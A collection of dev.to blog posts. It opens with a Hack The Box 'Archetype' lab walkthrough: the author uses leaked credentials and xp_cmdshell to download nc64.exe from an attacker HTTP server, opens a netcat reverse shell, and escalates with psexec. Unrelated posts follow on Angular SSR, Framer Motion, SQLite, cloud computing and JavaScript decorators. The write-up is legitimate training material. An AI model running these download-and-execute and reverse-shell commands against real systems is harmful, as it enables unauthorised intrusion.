1,917,888 | Hack The Box — Archetype Walkthrough | This box gives exposure to: Protocols MSSQL SMB Powershell Reconnaissance Remote Code... | 0 | 2024-07-10T04:45:51 | https://dev.to/gabe-blog/hack-the-box-archetype-walkthrough-p5n | > This box gives exposure to:
> - Protocols
>   - MSSQL
>   - SMB
> - Powershell
> - Reconnaissance
> - Remote Code Execution
> - Clear Text Credentials
> - Information Disclosure
> - Anonymous/Guest Access
Starting off with the ping command to verify that my machine can reach the target machine.
_Screenshot 1: Ping command_
**ping {target_ip_address}**
Additionally, when a packet is sent, it typically starts with an initial Time To Live (TTL) value set by the operating system (OS). By looking at the TTL of the packet we can GUESS the OS running on our target machine. Keep in mind that initial TTL values can be modified.
Common initial TTL values include:
> **Windows:** Initial TTL of 128.
> **Linux/Unix:** Initial TTL of 64.
> **Cisco routers:** Initial TTL of 255.
We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.
Looking at the output of the ping command in Screenshot 1, we can see that the TTL is equal to 127, so we can also guess the target machine is running Windows.
_“But Gabe you just said that the TTL of Windows is 128 not 127 ☝🏽🤓”_
Note that each router that forwards the packet decreases the initial TTL value by one. By the time the packet arrives at its destination (our host machine), the TTL value will have been reduced by the number of hops it took to reach us. Meaning we can assume one hop from the target machine to our machine.
---
_Screenshot 2a: Nmap scan_
Time for some enumeration with Nmap. Here we are using the Nmap command to scan for any open TCP ports on our target machine using the following options:
***nmap -sC -sV -T4 {target_ip_address}***
> **-sC** (Default Script Scan): Runs a set of default Nmap Scripting Engine (NSE) scripts against the target. These scripts perform various tasks such as checking for common vulnerabilities, retrieving system information, and more.
> **-sV** (Version Detection): Tries to determine the version of the services running on open ports by sending various probes and analyzing the responses. This helps identify the specific software and version running on a port.
> **-T4** (Timing Template 4): Sets the timing template to “aggressive,” which speeds up the scan by reducing wait times between probes and increasing parallelization. It’s faster than the default but may increase the likelihood of detection and missed open ports.
---
_Screenshot 2b: Nmap scan cont._
Looking at the output of the initial Nmap scan in Screenshot 2b we can see that SMB ports are open. SMB uses either IP port 139 or 445.
> **Port 139:** SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
> **Port 445:** Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.
_“What’s SMB used for anyway?_☝🏽🤓_”_
**SMB (Server Message Block)** is a protocol used for sharing resources like files and printers on a network. Essentially, SMB makes it easy to share resources over a network, with Windows having it natively supported and Linux requiring a bit of setup with the open-source software suite, Samba.
Now we can use a tool called smbclient from the Impacket library, which is a powerful collection of Python classes for working with network protocols.
---
_Screenshot 3a: Smbclient enumeration_
**smbclient -N -L \\\\{target_ip_address}\\**
> **-N:** No password
> **-L:** This option allows you to look at what services / shares are available on a server
If we look at the output of the smbclient command in Screenshot 3a we are presented with a few notable shares. Running the following command we can try to access each share using the -N (No password) option followed by the target IP address and the Sharename.
---
_Screenshot 3b: Smbclient enumeration cont._
**smbclient -N \\\\{target_ip}\\{sharename}**
Once successfully connected to the backups share, I noticed a file named **prod.dtsConfig**. After using the `get` command to download the file to our host machine, we exit our connection to the share.
---
_Screenshot 4: Clear text user credentials_
Back in our host machine we can use the cat command to display the output of **prod.dtsConfig** to our screen where we find our first set of clear-text credentials for a user **sql_svc** with a password of **M3g4C0rp123**.
_Screenshot 5: MSSQL user authentication using mssqlclient_
In Screenshot 5, we use a tool called mssqlclient (also from the Impacket library) to authenticate to the SQL server, where we can begin interacting with it.
**mssqlclient.py -windows-auth {domain/user}@{target_ip}**
> **-windows-auth:** Specifies to authenticate to the SQL Server using Windows authentication.
After running the command, we are prompted to enter the password for the sql_svc user, which we found previously in **prod.dtsConfig**. Mssqlclient confirms that it has successfully connected to the SQL Server, changed the necessary settings, and shows the SQL Server version (Microsoft SQL Server 14.00.3232). We are then provided with an interactive SQL prompt (ARCHETYPE\sql_svc dbo@master) where we can enter and execute SQL commands directly on the server.
---
_Screenshot 6: Checking of our user’s role in the server_
In Screenshot 6, we are executing SQL queries to check our role and user identity.
**SELECT is_srvrolemember(‘sysadmin’)**
This SQL query checks if the current user is a member of the ‘sysadmin’ server role. Returns 1 if the user is a member of the ‘sysadmin’ role, 0 if not, and NULL if the role does not exist.
We receive a 1 back indicating that our current user is a member of the ‘sysadmin’ role.
We can also see below that we first tried to run the ‘whoami’ command directly in the SQL prompt and got an error back. This didn't work because ‘whoami’ is a command for the operating system, not for SQL Server, so SQL Server didn't recognize it and returned an error.
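For reference, a few related checks that can be run from the same SQL prompt (standard T-SQL; the exact output depends on the target):

```sql
SELECT SYSTEM_USER;                      -- the login we authenticated as
SELECT IS_SRVROLEMEMBER('sysadmin');     -- 1 = member of the sysadmin role
SELECT name FROM master.sys.databases;   -- enumerate databases on the instance
```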
---
_Screenshot 7: Command execution on MSSQL server_
In Screenshot 7, we show that we can use the xp_cmdshell feature to correctly run the whoami command at the operating system level, allowing the SQL Server to run it and show the current domain\user.
---
_Screenshot 8: Checking current directory_
After checking for the name of our current user I also wanted to note the directory we were currently located in.
**xp_cmdshell "powershell -c pwd"**
> **powershell:** This launches PowerShell, which is a powerful command-line shell and scripting language in Windows.
> **-c:** This tells PowerShell to execute the following command.
> **pwd:** This is a PowerShell command that stands for “print working directory”. It shows the current directory (folder) that PowerShell is operating in.
The output shows we are located at **C:\Windows\system32**.
_“But why does knowing the folder we’re located in matter ☝🏽🤓”_
Imagine you’re in a big office building, and someone asks you to find a specific file. If they tell you the file is in the accounting department’s office (a specific room), it’s much easier to locate the file. Similarly, knowing the current directory (**C:\Windows\system32**) tells you exactly where you are on the computer, so you can find or place files correctly.
---
_Screenshot 9: Checking for folders with write permissions_
Next, I wanted to take a look into our current user’s directory for a good place to drop a tool called nc64.exe with the following command:
**xp_cmdshell "powershell -c dir C:\Users\sql_svc"**
Netcat, often abbreviated as “nc,” is a versatile networking tool that can read and write data across network connections. By dropping the Netcat tool on the target Windows machine, we can set up a way to connect to that remote computer’s command line. This allows us to run commands and check the system without being physically present.
---
_Screenshot 10: Setting up http server for netcat upload_
In screenshot 10, I start up a simple HTTP server on port 1337 on our host machine to make the current directory accessible over the network. This starts a server that will make our nc64.exe file available at http://<host_ip_address>:1337.
**sudo python -m http.server 1337**
> **sudo:** Allows you to run commands with superuser (administrator) privileges. It’s often needed for tasks that require higher permissions.
> **python -m http.server:** This part uses Python to start a simple HTTP server. Python has a built-in module called http.server that makes it easy to serve files over the web.
> **1337:** This specifies the port number on which the server will listen. Ports are like channels through which data is transmitted over the network. In this case, the server is using port 1337.
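Before pulling the file from the target, it can be worth a quick local sanity check that the server is actually serving what you expect. This throwaway sketch (the port and paths here are arbitrary examples) spins up a server, fetches a dummy file, and tears it down:

```shell
mkdir -p /tmp/serve_test && echo "dummy payload" > /tmp/serve_test/nc64.exe
(cd /tmp/serve_test && python3 -m http.server 18347 >/dev/null 2>&1 & echo $! > /tmp/serve_test/pid)
sleep 1
curl -s http://localhost:18347/nc64.exe   # prints: dummy payload
kill "$(cat /tmp/serve_test/pid)"
```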
---
_Screenshot 11: Pulling the netcat executable from our HTTP server on port 1337_
**xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe"**
> **powershell:** You know what this does by now hopefully
> **-c:** Same here, if not scroll back to screenshot 8.
> **cd C:\Users\sql_svc\Downloads:** This changes the directory to C:\Users\sql_svc\Downloads where the file will be downloaded.
> **wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe:** This uses the wget command to download a file from http://{host_ip_address}/nc64.exe and saves it as nc64.exe in the current directory.
We have now successfully dropped nc64.exe onto our target Windows machine.
---
_Screenshot 12: Setting up netcat listener_
**sudo nc -nvlp 4444**
> **sudo:** This command allows a permitted user to execute a command as the superuser or another user, as specified by the security policy. In this case, it runs the nc command with elevated privileges.
> **nc:** This is the Netcat utility, often referred to as the “Swiss Army knife” of networking. It can read and write data across network connections using the TCP/IP protocol.
> **-n:** This option tells Netcat not to do DNS lookups on the IP addresses, which speeds up the process.
> **-v:** This option enables verbose mode, providing more detailed output.
> **-l:** This option tells Netcat to listen for an incoming connection rather than initiate a connection.
> **-p 4444:** This specifies the port number that Netcat will listen on. In this case, we chose port 4444.
---
_Screenshot 13: Binding cmd.exe through our netcat listener_
**xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe {host_ip_address} 4444"**
> **powershell -c cd C:\Users\sql_svc\Downloads;**: This changes the directory to C:\Users\sql_svc\Downloads where the nc64.exe file is located.
> **.\nc64.exe -e cmd.exe 10.10.14.54 4444:** This runs the nc64.exe (Netcat) program with specific options:
> **-e cmd.exe:** This option tells Netcat to execute cmd.exe (Command Prompt) once a connection is established.
> **{host_ip_address} 4444:** These specify the IP address (10.10.14.54) and port (4444) to connect to. This is where the listener (from the previous screenshot) is waiting for connections.
---
_Screenshot 14: Reverse shell_
Here we have created what’s known as a “reverse shell”: a type of network connection where a computer (the “target”) initiates a connection to another computer (the listener) and hands control of its command-line interface over to us. Using the **whoami** command here shows we are executing commands directly on the target machine as **sql_svc**.
---
_Screenshot 15: User flag_
Taking a look into the user’s Desktop, we find a **user.txt** file. Using `type user.txt` we can see the contents of the file, revealing our user flag.
---
_Screenshot 16: Checking PowerShell history to find clear text admin credentials_
In Screenshot 16 we **cd** (change directory) into **Roaming\Microsoft\Windows\Powershell\PSReadline\**, then output the contents of the directory with the dir command. The **ConsoleHost_history.txt** file within this directory stores PowerShell command history, which means you can refer back to previous commands used by a user on the machine. This is where we find our clear-text admin credentials.
---
_Screenshot 17: Privilege escalation via psexec.py_
In screenshot 17, we use psexec.py, a Python script that is part of the Impacket library, which provides a way to execute commands on remote Windows machines.
**psexec.py administrator@{target_ip_address}**
We can now enter the user (**administrator**) and password (**MEGACORP_4dm1n!!**) which we found from checking the console history.
Using **whoami** we see that we are working as **NT AUTHORITY\SYSTEM**, a built-in, highly privileged account that Windows uses to run essential system services and processes, with full control over the system.
---
_Screenshot 18: Root flag_
Checking the Administrator’s Desktop we find the second and final root flag.
*by gabe-blog*
---

# Forcing Angular SSR to Wait in 2024

*2024-07-10 · https://dev.to/jdgamble555/forcing-angular-ssr-to-wait-in-2024-4lc9 · tags: angular, webdev, javascript, async*

Angular has had a built-in way to wait on your functions to load, and you didn't know about it!
## In the past...
You needed to import the hidden function...
```ts
import { ɵPendingTasks as PendingTasks } from '@angular/core';
```
Notice the greek letter that you wouldn't normally find with autocomplete.
## Today
It is experimental, but you will soon be able to just import `PendingTasks`.
```ts
import { ExperimentalPendingTasks as PendingTasks } from '@angular/core';
```
## Setup
I use my `useAsyncTransferState` function for hydration. This ensures an async call, a fetch in this case, only runs once, and on the server.
```ts
export const useAsyncTransferState = async <T>(
name: string,
fn: () => T
) => {
const state = inject(TransferState);
const key = makeStateKey<T>(name);
const cache = state.get(key, null);
if (cache) {
return cache;
}
const data = await fn() as T;
state.set(key, data);
return data;
};
```
## Token
We need reusable tokens for the `REQUEST` object.
```ts
// request.token.ts
import { InjectionToken } from "@angular/core";
import type { Request, Response } from 'express';
export const REQUEST = new InjectionToken<Request>('REQUEST');
export const RESPONSE = new InjectionToken<Response>('RESPONSE');
```
We must pass the request object as a provider in our render function.
```ts
// main.server.ts
export default async function render(
url: string,
document: string,
{ req, res }: { req: Request; res: Response }
) {
const html = await renderApplication(bootstrap, {
document,
url,
platformProviders: [
{ provide: REQUEST, useValue: req },
{ provide: RESPONSE, useValue: res },
],
});
return html;
}
```
Angular is currently in the process of [adding all of these features](https://github.com/angular/angular/discussions/56785), and potentially endpoints!!!!! 😀 😀 😀 🗼 🎆
### Fetch Something
Because endpoints are not currently there, I am testing this with Analog. Here is a `hello` endpoint that takes 5 seconds to load.
```ts
import { defineEventHandler } from 'h3';
export default defineEventHandler(async () => {
const x = new Promise((resolve) => setTimeout(() => {
resolve({
message: "loaded from the server after 5 seconds!"
});
}, 5000));
return await x;
});
```
## Test Component
Here we use the `request` in order to get the host URL. Then we use `useAsyncTransferState` to ensure things only run on the server, and only once. Finally, we use `pendingTasks` to ensure the component is not fully rendered until the async completes.
```ts
import { AsyncPipe } from '@angular/common';
import {
Component,
ExperimentalPendingTasks as PendingTasks,
inject,
isDevMode
} from '@angular/core';
import { REQUEST } from '@lib/request.token';
import { useAsyncTransferState } from '@lib/utils';
@Component({
selector: 'app-home',
standalone: true,
imports: [AsyncPipe],
template: `
<div>
<p class="font-bold">{{ data | async }}</p>
</div>
`
})
export default class HomeComponent {
private pendingTasks = inject(PendingTasks);
protected readonly request = inject(REQUEST);
data = this.getData();
// fetch data, will only run on server
private async _getData() {
const schema = isDevMode() ? 'http://' : 'https://';
const host = this.request.headers.host;
const url = schema + host + '/api/hello';
const r = await fetch(url, {
headers: {
'Content-Type': 'application/json',
}
});
const x = await r.json();
return x.message;
}
// fetch data with pending task and transfer state
async getData() {
const taskCleanup = this.pendingTasks.add();
const r = await useAsyncTransferState('pending', async () => await this._getData());
taskCleanup();
return r;
}
}
```
## Pending Task
Pending Task is very simple.
```ts
// create a new task
const taskCleanup = this.pendingTasks.add();
// do something async
const r = await fn();
// let Angular know it can render
taskCleanup();
```
That's it! Bingo Shabongo!
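If you end up repeating this pattern across components, a small `try`/`finally` wrapper guarantees the cleanup runs even when the async work throws. Here's a framework-free sketch (the `MockPendingTasks` class below is my stand-in for Angular's service, just to show the contract):

```typescript
// Stand-in for Angular's PendingTasks: add() registers a task and returns
// a cleanup function; SSR waits to serialize while the count is above zero.
class MockPendingTasks {
  private count = 0;
  add(): () => void {
    this.count++;
    return () => { this.count--; };
  }
  get pending(): number { return this.count; }
}

// try/finally ensures taskCleanup() runs even if fn() rejects.
async function withPendingTask<T>(tasks: MockPendingTasks, fn: () => Promise<T>): Promise<T> {
  const taskCleanup = tasks.add();
  try {
    return await fn();
  } finally {
    taskCleanup();
  }
}

const tasks = new MockPendingTasks();
withPendingTask(tasks, async () => 'done').then((result) => {
  console.log(result, tasks.pending); // done 0
});
```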
**Repo:** [GitHub](https://github.com/jdgamble555/pending-tasks)
**Demo:** [Vercel Edge](https://pending-tasks.vercel.app/) - Takes 5s to load!
## Should you use this?
Nope! Seriously, don't use this.
After going down the rabbit hole for years on Angular async rendering (read the old posts in this chain), it is definitely best practice to put ALL async functions in a `resolver`. The resolver MUST load before a component, which is a much better development environment. The only exception would be `@defer` IMHO.
However, there are some edge cases where it makes sense for your app. This is particularly evident when you don't want to rewrite your whole application to use resolvers. Either way, you need to be aware of your options!
J
*by jdgamble555*
---

# Day 987 : Side Quest

*2024-07-10 · https://dev.to/dwane/day-987-side-quest-273c · tags: hiphop, code, coding, lifelongdev*

_liner notes_:
- Professional : Had a meeting to start my day. Responded and researched some community questions. Added some functionality to an application I've been refactoring to use a new version of an SDK. Had another meeting. Then I did some more refactoring and then called it a day.
- Personal : Went through some tracks for the radio show. Went on a long side quest researching possibly buying a new backpack for when I travel. I looked at different manufacturers. I even watched review videos that were in different languages and relied on translated captions. haha I made a decision, but waiting to see what happens with the Samsung Galaxy Unpacked event happening on Wednesday to see if I'll have any money left after the announcements. haha. Ended the night watching an episode of "Demon Slayer".

Going to work on the radio show some more. May do some quick research on the travel backpack again. I need to figure out what I actually need to code to finish up this side project. Probably write up a list. I've got one more episode of "Demon Slayer" to watch before I catch up and that last episode... wow!
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube J5T3yrByOiU %}

*by dwane*
---

# Framer Motion | Introduction - Part 1

*2024-07-10 · https://dev.to/boraacici/framer-motion-introduction-part-1-4858 · tags: react, javascript, webdev, tutorial*

**Introduction**
Framer Motion is a library that allows you to easily add animations to your React applications. It is used to add animation effects such as transitions and drag interactions.
**Creator**
It was created by the company Framer. Framer is a company that develops tools specifically for user interface (UI) design and prototyping.
**Installation**
Framer Motion supports React 18 and higher versions. To install it via npm, run the following command:
```
npm install framer-motion
```
The Framer Motion library has no dependencies and you can start using it with a single package.


As of July 10, 2024, Framer Motion has approximately 3.4 million weekly downloads on npm and 22,700 stars on GitHub, indicating significant appreciation from its users.
**Usage**
Within your desired component, you can import the **_motion_** object from the **_framer-motion_** library and add a motion component for any HTML or SVG element.
```jsx
import { motion } from "framer-motion";
export default function App() {
return <motion.div />;
}
```
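A `motion` component accepts animation props on top of the normal element props. For example (the `animate` and `transition` props shown here as a small illustration; later parts of this series cover them in depth):

```jsx
import { motion } from "framer-motion";

export default function App() {
  // Slides the div 100px to the right over half a second
  return <motion.div animate={{ x: 100 }} transition={{ duration: 0.5 }} />;
}
```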
*by boraacici*
---

# Developing Smart Contracts with Truffle and Ganache

*2024-07-10 · https://dev.to/kartikmehta8/developing-smart-contracts-with-truffle-and-ganache-2670*

Introduction:
Smart contracts have revolutionized the way businesses operate by providing a secure and transparent way of implementing agreements. They are self-executing contracts based on blockchain technology that eliminates the need for intermediaries in transactions. Developing smart contracts on the blockchain may seem like a daunting task, but with Truffle and Ganache, the process becomes easier and more efficient.
Advantages:
Truffle is a popular development framework that provides a comprehensive suite of tools for building and testing smart contracts. It simplifies the development process by providing a robust network, efficient testing framework, and easy debugging. On the other hand, Ganache is a personal blockchain platform that allows developers to test their smart contracts locally without incurring any gas fees. This saves both time and money as developers can quickly identify and fix any issues before deploying the contract on the live blockchain network.
Disadvantages:
One of the main disadvantages of using Truffle and Ganache is their steep learning curve. For new developers, it may take some time to get familiar with the tools and their functionalities. Additionally, Ganache only allows for local testing, so the smart contract may perform differently in a live network, leading to unforeseen errors.
Features:
Truffle and Ganache come with a range of features that make smart contract development efficient and hassle-free. Truffle provides automated contract testing, built-in build scripts, and built-in support for popular smart contract languages like Solidity and Vyper. Ganache offers a user-friendly interface for local testing, real-time contract execution, and the ability to change blockchain parameters for testing different scenarios.
Conclusion:
In conclusion, Truffle and Ganache are powerful tools that simplify the process of developing smart contracts. With their range of features and advantages, they are excellent for both beginners and experienced developers. However, it is essential to keep in mind their limitations and invest time in learning the tools thoroughly to harness their full potential. Overall, Truffle and Ganache make developing smart contracts a seamless and efficient process.

*by kartikmehta8*
---

# UNDERSTANDING CLOUD COMPUTING

*2024-07-10 · https://dev.to/rosemary_aggreyyorke_992/understanding-cloud-computing-5daa*
Cloud computing cuts down cost for, in other words you pay for what you use. If you are not using it there is no cost involved.
It makes work easier and faster for developers. Also, there is a higher level of security cloud computing.
There are three deployment models, which consist of public cloud,private cloud and hybrid cloud.
Public cloud- A public cloud is a platform managed by an outside company that provides resources and services over the internet to users everywhere. It includes things like virtual machines, applications, and storage that can be accessed remotely.
Private cloud- A private cloud is a cloud setup just for one organization. It has its own computing resources like CPUs and storage that can be accessed when needed through a self-service portal. It is also known as an internal or corporate cloud.
Hybrid cloud- A hybrid cloud is a mix of different computing setups where applications use resources from both public and private clouds, as well as on-site data centers or edge locations. Many organizations use hybrid clouds because they don't rely solely on one public cloud provider.
The cloud service models are;
IaaS: Infrastructure as a Service is a cloud computing model that provides on-demand access to computing power, storage, and networking. Example: Rackspace

PaaS: Platform as a Service provides a full cloud environment with everything developers need to create, run, and manage applications. This includes servers, operating systems, networking, storage, middleware, and tools. Example: AWS Elastic Beanstalk

SaaS: Software as a Service gives organizations benefits like flexibility and cost savings. With SaaS, vendors handle tasks like installing, managing, and updating software, so employees can focus on more important things. Example: Netflix
*by rosemary_aggreyyorke_992*
---

# What charts would you want in a Portal?

*2024-07-10 · https://dev.to/what-the-portal/what-charts-would-you-want-in-a-portal-15f9*

shadcn came out with some nice looking charts recently - we're going to add some into the widgets for you to see on your Portals. Boom.
Which ones would you want, and for what type of widgets?
Join the discussion
https://www.reddit.com/r/WhatThePortal/comments/1dzj122/how_about_some_charts/
*by whattheportal*
---

# How To Install SQLite On Windows

*2024-07-10 · https://dev.to/kotect/how-to-install-sqlite-on-windows-4b3g*

Howdy, In This Article We Will See How To Install Sqlite On Windows OS.
### Installing Steps
1- Go To **[Sqlite Download Page](https://www.sqlite.org/download.html)** And Download `sqlite-tools-win-________.zip`

.
2- Now Extract The zipped File Then Rename The Extracted Folder To `sqlite`

.
3- Move The `sqlite` Folder To This Path `C:\Program Files`
> You Can Put The Folder At Any Path You Like!
.
4- Open Windows Search And Type `Environment Variables` Then Click On It, And Add The `sqlite` Folder Path To The **Environment Variables Path** By Clicking On Environment Variables > Choose Path > New > Paste The Path > Ok.

> You May Need To Restart Your PC If The sqlite Didn't Worked In The Last Step.
.
## Verifying The Installation
> Let's Make Sure That sqlite Is Installed And Working Properly.
Open command prompt `CMD` And Type:
```
sqlite3 --version
```
If You Got This Message Congrats! Installation Success:

<br>
**That's All, Thanks For Reading.
Please Follow Me For More Tutorials ❤️**

*by karim_abdallah*
---

# Composing JavaScript Decorators

*2024-07-10 · https://dev.to/frehner/composing-javascript-decorators-2o38 · tags: webdev, javascript*

A walkthrough and best practices guide on how to compose JavaScript decorators that use auto-accessors.
## Table of Contents
Consider skipping straight to [Best Practices](#best-practices)!
- [Context and Specification](#context-and-specification)
- [Preface](#preface)
- [Composing Decorators](#composing-decorators)
- [Non-Functional Chaining Example](#nonfunctional-chaining-example)
- [Writing Composable Decorators](#writing-composable-decorators)
- [Order Matters](#order-matters)
- [Best Practices](#best-practices)
## Context and Specification
The [Decorators Proposal on GitHub](https://github.com/tc39/proposal-decorators) and [my previous article on decorators](https://dev.to/frehner/javascript-decorators-and-auto-accessors-437i) already do a great job of breaking down the basic use-cases of decorators. My goal isn't to recreate those examples there, but instead to highlight some lesser-known features and interactions. Additionally, I'll highlight how to compose or chain multiple decorators on a single class property.
## Preface
Each code sample will come with a link to an interactive [Babel REPL playground](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=Q&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D), so you can try it for yourself without needing to set up a polyfill or spin up a repo. The "Evaluate" option in the top left (under `Settings`) should be checked in all my examples, which means that you will be able to see the code, edit it, open your browser's dev console, and see the logs / results there.
**You don't need to pay attention to the transpiled code on the right-hand side of the Babel REPL**, unless you want to dig into the polyfill for decorators. The left-hand side of the Babel REPL is where you can edit and write code to try out for yourself.
**To emphasize, your developer tools' console should show console logs. If it doesn't, make sure that `Evaluate` is checked in the top left.**
## Composing Decorators
One important use-case that the proposal doesn't show is how to compose (or combine multiple) decorators on a single property. This is a powerful tool which helps keep your decorators clean and reusable, so let's dig into it.
In my [previous article on decorators](https://dev.to/frehner/javascript-decorators-and-auto-accessors-437i), it was annoying to have to manually `console.log` after changing the value, so let's make a decorator that does that automatically for us - all while keeping the `evensOrOdds` decorator there, too!
### Non-Functional Chaining Example
My first impression when working with chaining decorators is that it would be as simple as adding the decorator and things would "Just Work". Unfortunately, that isn't the case; in this example below, I've added the `logOnSet` decorator before and after a property in order to demonstrate the issue. [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_kIiSDb69uRObnYx_AC-mpmImJFq5NGhsbqYUIhgLp5p7riq6ux5ZjDAJDCYDgoOJNXO7CWlsQD0I9IIAOSVBZVQABbIiEVs1sDWUJOYVXCVClUu9XnmAQnWtil1GcN-WS1tfTUApIgATIgAhAxMZGBUtBhtgB-byIABciAAjINgmY4acgkk7GBHIdrsMzHcbq0LijUmjcJ4iscBPFEbjUelcHksbdfHc7jxxNB4EhyHAwtgwABlSIAB0EwBgBk8kwUIGU7LCEVwkyGCLE4BZUhkckUygaK2Q2l0-iMQ34CuCN1mjWKxpuOgQmDglgAdFKSALkEKDNois1LaTAkhiTdadl6TxGRByApMNsALKUADCYYjFoAAmhAXhCMQSCw2J7EImpVzeVASJMU2AALRSmVguW-BQQCDICPyRDOGh0K7U_i-PMcguRSZwIgVjlVmv8ZN0HD4IikYDqAo5usNpuE1vpjvBng8cpzZDOPmeMDIADuiGjcfDpGa5VtyAdHOLpYhMjnIHIlS1k20-n3dtbALADtmh4H8-T_NsMA7UVFnIdlJm3a1b3vMJHzoCEFGAZJmFwSgbDCZg4HyKwbCKGACGWdQ2C_Zg9zA_92wJYDQPAgCoKYABmBCsCQx0SzQxAMKwlhcLAfDlCIuZCMHcj-nqajmPoyDGK3BSIMAglPAAFi4m17V4p8BMwjxZlgUSCJQOgDipeTaJYhiqWAsZEDLFzXLclytxvPSHwHIhnxdcV3wojRkBs381yIICVNsiKCDYxBJhguCdJ4nzpPQozCWEvDzNmc5SPIz9vxiyh12UkCSrKqlPE4ry7149LDKEnCcvEvLxOkqy5OK8LSsi8rVKq-otJS7yUN8ggMqwkzWsI0sursMK6L6uLGIAbiAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
// THIS DOES NOT WORK CORRECTLY, DO NOT USE
// code collapsed from previous examples
function evensOrOdds(){}
function logOnSet(prefix = 'autologger') {
return function decorator(value, context) {
return {
set(val) {
console.log(prefix, val)
return val
}
}
}
}
class MyClass {
@evensOrOdds(true)
@logOnSet('even-logger:')
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
If you open the Babel REPL and look at the console logs, you may notice a couple of things:
- `even-logger` never shows up 🤔
- `myOddNumber` is always `0`, even though the `odd-logger` shows that there's a different value that's trying to be set 🤔
Despite the order we place the decorators in, nothing seems to be working as we expect it to. What's going on?
### Writing Composable Decorators
There's an important line in the decorators proposal that affects how multiple decorators work:
>Accessor decorators receive the original underlying getter/setter function as the first value, and can optionally return a new getter/setter function to replace it. Like method decorators, this new function is placed on the prototype in place of the original (or on the class for static accessors), and if any other type of value is returned, an error will be thrown.
In other words, the last-applied decorator's setter/getter methods win out, and none of the other decorators setters/getters are applied.
Since only one setter/getter is ever applied, how would we chain decorators?
Fortunately, our decorator is passed the previous decorator's setter/getter methods (or the native getter/setters if there are no others), so we can call them ourselves! Let's update the `logOnSet` decorator to do this, using the `value` parameter that the decorator is passed: [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_kIiSDb69uRObnYx_AC-mpmImJFq5NGhsbqYUIhgLp5p7riq6ux5ZjDAJDCYDgoOJNXO7CWlsQD0I9IIAOSVBZVQABbIiEVs1sDWUJOYVXCVClUu9XnmAQnWtil1GcN-WS1tfTUApIgATIgAhAxMZGBUtBhtgB-byIABciAAjINgmY4acgkk7GBHIdrsMzHcbq0LijUmjcJ4iscBPFEbjUelcHksbdfHc7jxxNB4EhyHAwtgwABlSIAB0EwBgBk8kwUIGU7LCEVwkyGCLE4BZUhkckUygaK2Q2l0-iMQ34CuCN1mjWKxpuOgQFUQArQ8BAmF5UGSADV1KsmFqAHSzb0QdTkEgLTraIqcIEg4mWq1YOCWb1Skh2oUGbR21AOp1CN0ejgko0ZrPO3MaZA0mK0hk8HgQcgKTDbACylAAwvXGxaAAJoQF4QjEYOsfP8LtSrnOkiTXtgAC0UplYLlvgUEAgyEb8kQzhodCu1P4vjHHInkUmcCI845i-Xo5nOHwRFIwHUBWa_FX683hJ3A_3PEZco5mQZw-U8MBkAAd0QFt2wbUhmnKeNkETDkpxnCEZBfEByEqLVJm0fRQO9HcATAfdmh4Ii-RI3cMH3UVFnIdlJlra1kNQsJ0LoCEFGAZJmFwSgbDCZg4HyKwbCKGACGWPMCOYECaNIvcCUo6jaLIhimAAZjYuMEyTaceMQPiBJYYSwFE5QJLmcSL1k_p6gUjSVPotSa1cujyIJTwABZ9MwDijIw0z-I8WZYCssSUDoA4qRcpTNNUqlKLGRBZ0yrLstnGskMMtDzyITDkGw3C5LLRLiN_IgKM8pKaoIbTEEmJiWMC4LCoc3jwsJCyRJi2Zzmk2T8MIhrKD_DyqImqaqU8PT8pQozurC8yhIGmyhpshz4uc8bqsm2rpq8ub6n8jqCq4oqCB6gTIs28SZz2uwquUo6mrUgBuIA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
function logOnSet(prefix = 'autologger') {
return function decorator(value, context) {
return {
set(val) {
const previousSetterValue = value.set.call(this, val) ?? val
console.log(prefix, previousSetterValue)
return previousSetterValue
}
}
}
}
```
